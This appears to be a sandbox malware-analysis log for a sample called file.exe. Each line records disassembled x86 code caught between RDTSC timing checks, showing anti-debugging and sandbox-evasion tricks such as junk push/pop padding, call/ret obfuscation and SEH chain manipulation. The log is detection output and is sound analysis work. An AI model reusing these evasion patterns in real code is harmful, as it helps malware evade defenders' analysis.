Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1006AC1 second address: 1006AE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edx 0x00000006 jnc 00007F7014CC2CB6h 0x0000000c pop edx 0x0000000d popad 0x0000000e nop 0x0000000f movsx esi, ax 0x00000012 push 00000000h 0x00000014 mov di, dx 0x00000017 push 00000000h 0x00000019 mov esi, ebx 0x0000001b push eax 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1006AE2 second address: 1006AE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1006AE6 second address: 1006AEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100760F second address: 1007655 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F70146AC60Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov esi, dword ptr [ebp+122D36E5h] 0x00000011 push 00000000h 0x00000013 mov edi, 3D085344h 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push edx 0x0000001d call 00007F70146AC608h 0x00000022 pop edx 0x00000023 mov dword ptr [esp+04h], edx 0x00000027 add dword ptr [esp+04h], 00000015h 0x0000002f inc edx 0x00000030 push edx 0x00000031 ret 0x00000032 pop edx 0x00000033 ret 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 pushad 0x00000039 popad 0x0000003a pushad 0x0000003b popad 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100925C second address: 1009260 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1009260 second address: 1009274 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70146AC610h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100ACA7 second address: 100ACB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100ACB0 second address: 100ACB5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1007F48 second address: 1007F5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F7014CC2CBCh 0x0000000e jnc 00007F7014CC2CB6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1007F5C second address: 1007F77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70146AC617h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100C9AF second address: 100C9CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7014CC2CC3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100C9CA second address: 100C9DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F70146AC60Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100D52E second address: 100D538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100D538 second address: 100D553 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F70146AC606h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jne 00007F70146AC60Ch 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100D553 second address: 100D563 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7014CC2CBBh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100D995 second address: 100D99B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100D99B second address: 100D9F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push esi 0x0000000a pop edi 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F7014CC2CB8h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000014h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 stc 0x00000028 jmp 00007F7014CC2CBDh 0x0000002d push 00000000h 0x0000002f xchg eax, esi 0x00000030 pushad 0x00000031 jmp 00007F7014CC2CC9h 0x00000036 push eax 0x00000037 push edx 0x00000038 push edi 0x00000039 pop edi 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100D9F3 second address: 100DA1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70146AC611h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F70146AC612h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100FA31 second address: 100FA5C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7014CC2CC6h 0x00000008 jmp 00007F7014CC2CC0h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 jmp 00007F7014CC2CBCh 0x00000018 pop esi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100EB17 second address: 100EBCF instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F70146AC606h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F70146AC617h 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007F70146AC608h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 0000001Ch 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d push eax 0x0000002e jo 00007F70146AC60Ch 0x00000034 and edi, 717E7836h 0x0000003a pop ebx 0x0000003b push dword ptr fs:[00000000h] 0x00000042 mov di, E300h 0x00000046 mov dword ptr fs:[00000000h], esp 0x0000004d mov edi, 38EF9651h 0x00000052 mov eax, dword ptr [ebp+122D0EE9h] 0x00000058 jmp 00007F70146AC60Fh 0x0000005d push FFFFFFFFh 0x0000005f push 00000000h 0x00000061 push esi 0x00000062 call 00007F70146AC608h 0x00000067 pop esi 0x00000068 mov dword ptr [esp+04h], esi 0x0000006c add dword ptr [esp+04h], 00000016h 0x00000074 inc esi 0x00000075 push esi 0x00000076 ret 0x00000077 pop esi 0x00000078 ret 0x00000079 mov dword ptr [ebp+12446E19h], esi 0x0000007f nop 0x00000080 push eax 0x00000081 push edx 0x00000082 jng 00007F70146AC60Ch 0x00000088 jne 00007F70146AC606h 0x0000008e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100FC28 second address: 100FC2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100EBCF second address: 100EBD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1012A6B second address: 1012A7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7014CC2CC0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10140D0 second address: 10140D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101422E second address: 101423C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10151C7 second address: 101526F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jp 00007F70146AC609h 0x00000011 add bl, 0000003Ah 0x00000014 push dword ptr fs:[00000000h] 0x0000001b or bx, 2FBAh 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 push 00000000h 0x00000029 push esi 0x0000002a call 00007F70146AC608h 0x0000002f pop esi 0x00000030 mov dword ptr [esp+04h], esi 0x00000034 add dword ptr [esp+04h], 00000015h 0x0000003c inc esi 0x0000003d push esi 0x0000003e ret 0x0000003f pop esi 0x00000040 ret 0x00000041 mov eax, dword ptr [ebp+122D1735h] 0x00000047 jmp 00007F70146AC615h 0x0000004c push FFFFFFFFh 0x0000004e push 00000000h 0x00000050 push ecx 0x00000051 call 00007F70146AC608h 0x00000056 pop ecx 0x00000057 mov dword ptr [esp+04h], ecx 0x0000005b add dword ptr [esp+04h], 00000017h 0x00000063 inc ecx 0x00000064 push ecx 0x00000065 ret 0x00000066 pop ecx 0x00000067 ret 0x00000068 mov bl, 9Fh 0x0000006a call 00007F70146AC617h 0x0000006f movsx ebx, bx 0x00000072 pop ebx 0x00000073 push eax 0x00000074 push eax 0x00000075 push edx 0x00000076 push eax 0x00000077 push edx 0x00000078 jg 00007F70146AC606h 0x0000007e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101526F second address: 1015275 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1015275 second address: 101527B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101709D second address: 10170A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1018247 second address: 101824D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101A329 second address: 101A3B4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7014CC2CB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jno 00007F7014CC2CC3h 0x00000012 jmp 00007F7014CC2CBDh 0x00000017 nop 0x00000018 sbb ebx, 15D03CE5h 0x0000001e mov dword ptr [ebp+122D22F1h], eax 0x00000024 push 00000000h 0x00000026 pushad 0x00000027 mov di, si 0x0000002a mov cx, 2971h 0x0000002e popad 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ecx 0x00000034 call 00007F7014CC2CB8h 0x00000039 pop ecx 0x0000003a mov dword ptr [esp+04h], ecx 0x0000003e add dword ptr [esp+04h], 0000001Ch 0x00000046 inc ecx 0x00000047 push ecx 0x00000048 ret 0x00000049 pop ecx 0x0000004a ret 0x0000004b pushad 0x0000004c mov esi, dword ptr [ebp+122D34F9h] 0x00000052 popad 0x00000053 jg 00007F7014CC2CBCh 0x00000059 xchg eax, esi 0x0000005a jc 00007F7014CC2CE0h 0x00000060 push eax 0x00000061 push edx 0x00000062 jmp 00007F7014CC2CC1h 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1018380 second address: 101838A instructions: 0x00000000 rdtsc 0x00000002 js 00007F70146AC606h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101B392 second address: 101B396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101B396 second address: 101B3A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70146AC60Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101B3A9 second address: 101B3AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101B3AF second address: 101B3C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F70146AC606h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101C456 second address: 101C45B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101C45B second address: 101C4CC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F70146AC60Fh 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007F70146AC608h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 0000001Dh 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 jmp 00007F70146AC612h 0x0000002d push 00000000h 0x0000002f add edi, dword ptr [ebp+122D27FAh] 0x00000035 push 00000000h 0x00000037 cmc 0x00000038 mov dword ptr [ebp+122D1DC0h], ebx 0x0000003e xchg eax, esi 0x0000003f push ebx 0x00000040 push eax 0x00000041 jg 00007F70146AC606h 0x00000047 pop eax 0x00000048 pop ebx 0x00000049 push eax 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101C4CC second address: 101C4D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101C61A second address: 101C620 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101C620 second address: 101C6C3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F7014CC2CBAh 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F7014CC2CB8h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 push edx 0x00000029 xor dword ptr [ebp+122D56B6h], ecx 0x0000002f pop ebx 0x00000030 push dword ptr fs:[00000000h] 0x00000037 jnl 00007F7014CC2CB7h 0x0000003d mov dword ptr fs:[00000000h], esp 0x00000044 push 00000000h 0x00000046 push ebx 0x00000047 call 00007F7014CC2CB8h 0x0000004c pop ebx 0x0000004d mov dword ptr [esp+04h], ebx 0x00000051 add dword ptr [esp+04h], 0000001Bh 0x00000059 inc ebx 0x0000005a push ebx 0x0000005b ret 0x0000005c pop ebx 0x0000005d ret 0x0000005e mov dword ptr [ebp+122D2867h], esi 0x00000064 mov eax, dword ptr [ebp+122D1745h] 0x0000006a mov dword ptr [ebp+12453B20h], edx 0x00000070 push FFFFFFFFh 0x00000072 mov dword ptr [ebp+122D18FEh], esi 0x00000078 nop 0x00000079 ja 00007F7014CC2CC3h 0x0000007f push eax 0x00000080 push ecx 0x00000081 push eax 0x00000082 push edx 0x00000083 push esi 0x00000084 pop esi 0x00000085 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10256DB second address: 10256EA instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F70146AC606h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 102936D second address: 1029371 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1029371 second address: 1029377 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1029377 second address: 102937D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 102937D second address: 1029381 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 102E428 second address: 102E42F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 102E42F second address: 102E45A instructions: 0x00000000 rdtsc 0x00000002 ja 00007F70146AC60Ch 0x00000008 jbe 00007F70146AC606h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F70146AC616h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 102E45A second address: 102E468 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7014CC2CBAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1034118 second address: 103411C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103411C second address: 1034132 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F7014CC2CBEh 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1034132 second address: 1034136 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1034136 second address: 103413C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1034878 second address: 103487E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103487E second address: 1034882 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1034E27 second address: 1034E2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1034FB5 second address: 103500D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push ecx 0x00000008 jng 00007F7014CC2CB6h 0x0000000e pop ecx 0x0000000f push ebx 0x00000010 push eax 0x00000011 pop eax 0x00000012 pop ebx 0x00000013 popad 0x00000014 pushad 0x00000015 jne 00007F7014CC2CBEh 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d jns 00007F7014CC2CB6h 0x00000023 jmp 00007F7014CC2CBEh 0x00000028 jmp 00007F7014CC2CBEh 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 popad 0x00000031 jmp 00007F7014CC2CC5h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103AC47 second address: 103AC50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edi 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103AC50 second address: 103AC57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBB998 second address: FBB9AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F70146AC606h 0x0000000a popad 0x0000000b je 00007F70146AC60Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBB9AB second address: FBB9B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10396D1 second address: 10396D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1039829 second address: 1039833 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7014CC2CB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1039972 second address: 10399A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70146AC615h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F70146AC616h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10399A3 second address: 10399D9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F7014CC2CC7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F7014CC2CC4h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10399D9 second address: 10399DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10399DF second address: 10399EA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop edi 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1039B42 second address: 1039B46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1039C82 second address: 1039C90 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7014CC2CB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103A108 second address: 103A117 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F70146AC606h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103A3BF second address: 103A3C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103A3C8 second address: 103A3D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103A3D3 second address: 103A3D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103A3D9 second address: 103A3DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103A524 second address: 103A535 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b ja 00007F7014CC2CB6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103A535 second address: 103A539 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103A539 second address: 103A53F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103A53F second address: 103A54A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103A54A second address: 103A550 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103A693 second address: 103A6AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F70146AC617h 0x00000009 rdtsc
